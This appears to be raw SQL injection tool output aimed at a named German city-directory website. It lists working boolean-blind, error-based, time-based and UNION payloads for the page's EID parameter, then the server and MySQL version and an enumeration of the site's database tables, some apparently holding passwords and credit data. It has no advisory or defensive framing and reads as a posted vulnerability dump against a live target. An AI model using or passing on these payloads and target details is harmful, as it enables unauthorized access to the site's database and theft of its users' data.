http://www.koeln-stadt.de/cgi-bin/end_branchen.pl?SDT=26&BRA=266&EID=733
Parameter: EID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SDT=26&BRA=266&EID=733) AND 1123=1123 AND (3456=3456
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: SDT=26&BRA=266&EID=733) AND (SELECT 1678 FROM(SELECT COUNT(*),CONCAT(0x716b767071,(SELECT (ELT(1678=1678,1))),0x717a717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1052=1052
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: SDT=26&BRA=266&EID=733) AND (SELECT * FROM (SELECT(SLEEP(5)))NOsX) AND (7496=7496
Type: UNION query
Title: Generic UNION query (NULL) - 43 columns
Payload: SDT=26&BRA=266&EID=733) UNION ALL SELECT NULL,CONCAT(0x716b767071,0x71704f43694756624645,0x717a717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: db477099394
[24 tables]
+---------------------------------------+
| EBS1 |
| Home_E |
| Home_EBS |
| Home_R |
| Home_Root |
| Lci_B |
| Lci_Banner |
| Lci_Banner_New |
| Lci_E |
| Lci_EBS |
| Lci_News |
| Lci_Pass |
| Lci_Protokol |
| Lci_S |
| Lci_S_old |
| Nav_Left |
| Sc_Credit |
| Sc_Nach |
| Udo_E |
| Udo_EBS |
| Udo_R |
| Udo_Root |
| Webilly |
| wdr_news |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+